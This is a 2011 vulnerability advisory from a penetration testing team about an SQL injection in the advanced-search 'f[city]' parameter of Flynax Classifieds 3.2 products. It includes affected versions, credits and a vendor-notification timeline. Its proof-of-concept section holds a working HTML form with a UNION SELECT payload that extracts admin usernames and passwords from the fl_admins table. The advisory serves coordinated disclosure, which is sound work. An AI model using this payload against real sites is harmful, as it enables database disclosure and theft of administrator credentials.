Vulnerability found in Flynax Classifieds products

2011-09-26T00:00:00
ID SECURITYVULNS:DOC:27065
Type securityvulns
Reporter Securityvulns
Modified 2011-09-26T00:00:00

Description

I. BACKGROUND

Flynax is a software development company which produces several CMSs to mantain different kinds of classifieds websites.

II. DESCRIPTION

Nasel members discovered a critical vulnerability in the front-end of these products.

The vulnerability is an SQL injection in the advanced search, specifically in the "f[city]" parameter located at following files: - General Classifieds Software: dealers.html, - Real Estate Classifieds: agents-realtors.html. - Auto Classifieds Script: dealers.html - Pets Classifieds Software: dealers.html

Exploiting this vulnerability can lead to a full disclosure of the database.

III. AFFECTED PRODUCTS

  • General Classifieds Software 3.2
  • Auto Classifieds Script 3.2
  • Real Estate Classifieds 3.2
  • Pets Classifieds Software 3.2

IV. PoC

<form action="http://site/path/dealers.html" method="post"> Injection:<input value="') and 1=0 union all select 1,2,3,4,concat_ws(0x3a, User, Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from fl_admins#" name="f[city]" type="text"> <input type="hidden" name="search" value="true"> <input type="hidden" value="" name="f[country]"> <input type="submit" value="Send"> </form>

The name of the admin users table can differ depending on the product's version.

V. CREDITS

This vulnerability was found by the Nasel Penetration Testing team formed by: - Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar) - Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar) - Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar) - Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)

VI. ADVISORY INFORMATION

2011-09-15

Vulnerability Found. Vendor notification. Scheduled advisory release on September 25th, 2011.

2011-09-17

Vendor replied that the problem was fixed.

2011-09-25

Advisory released.

-- Nasel Penetration Testing Team http://www.nasel.com.ar